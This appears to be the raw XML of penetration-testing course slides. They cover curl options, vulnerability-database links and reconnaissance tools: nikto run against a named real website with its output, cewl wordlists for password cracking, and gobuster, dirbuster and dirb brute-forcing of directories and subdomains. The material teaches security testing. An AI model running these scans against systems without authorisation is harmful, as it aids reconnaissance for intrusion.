              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--http1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--http2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--http3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-I 	HTTP Head method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-G	HTTP GET method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-k	Allow insecure SSL connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-L 	Follow redirects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-X	HTTP Method to use (i.e. TRACE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-b --cookie	Cookie to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-c --cookie-jar	Use Cookie Jar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-d --data	HTTP POST body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-H	Add Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Include response headers in output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3975352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CAB8C-46CE-2D42-A99A-14D4CB924BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9592E8C3-79E9-724B-8822-F79753F3B585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit DB: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/47502</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-14287</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIST: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://nvd.nist.gov/vuln/detail/CVE-2019-14287</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rapid7: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-14287</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vuln DB: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://vuldb.com/?id.143468</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BugTraq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://seclists.org/oss-sec/2019/q4/18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CxSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cxsecurity.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google Dorks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.exploit-db.com/google-hacking-database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2562976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6CC6C-D933-544E-B6D0-A2F2F6EC05AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8438F28-C353-BD41-9F5F-E2CE68D0E341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-280" t="-3867" r="38492" b="-5505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="92213" y="1181366"/>
            <a:ext cx="9051787" cy="3669271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39927856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6EE4B-4C5A-134C-BD8E-CC8B3BC6D605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1132880D-8BB4-A248-888F-8F99A7108640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -host https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Server: Apache/2.4.6 (Red Hat Enterprise Linux)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Cookie visid_incap_144072 created without the secure flag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Cookie visid_incap_144072 created without the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> flag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Cookie incap_ses_975_144072 created without the secure flag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Cookie incap_ses_975_144072 created without the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Entry ‘/tools/’ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>robots.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> returned a non-forbidden or redirect HTTP code (302)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Entry ‘/auth/’ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>robots.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> returned a non-forbidden or redirect HTTP code (200)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Entry ‘/claim/’ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>robots.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> returned a non-forbidden or redirect HTTP code (200)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ The Content-Encoding header is set to “deflate” this may mean that the server is vulnerable to the BREACH attack.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2316170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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1216429"/>
          <a:ext cx="8229600" cy="3771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117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BB75-97A1-2242-BDFB-F854E95B40ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cewl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77EAAA0-DE53-3443-A50A-EFB4A3F47261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Scrape website for words to add to dictionaries. Useful for forced directory browsing and password cracking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>cewl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> -w -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>word_list.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and, 10210</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the, 9041</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>arrow, 7709</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>MarkMonitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, 5028</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>your, 3725</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>brand, 3616</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>domain, 2898</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2269070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5C70B-DF23-3A49-A33B-B97CC6940411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67559FF0-946E-F84D-91A2-E17A456CAFD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forced directory or file browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://dojo-basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Discovery/Web-Content/raft-large-directories-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lowercase.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -e -l -s ‘200,204,301,302,307,401,403,500’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forced DNS or subdomain browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>markmonitor.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mm_wordlist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161722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000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19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8156-94DF-1F40-8ECA-FF8F0B356BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720E3CB7-AA79-2F4C-918F-EF105FBBCC8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUI based tool that will recursively brute force directories and files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Launch the GUI from the command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1182486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498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6B4A2-96A2-BB4B-97E5-B4279DA1AAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
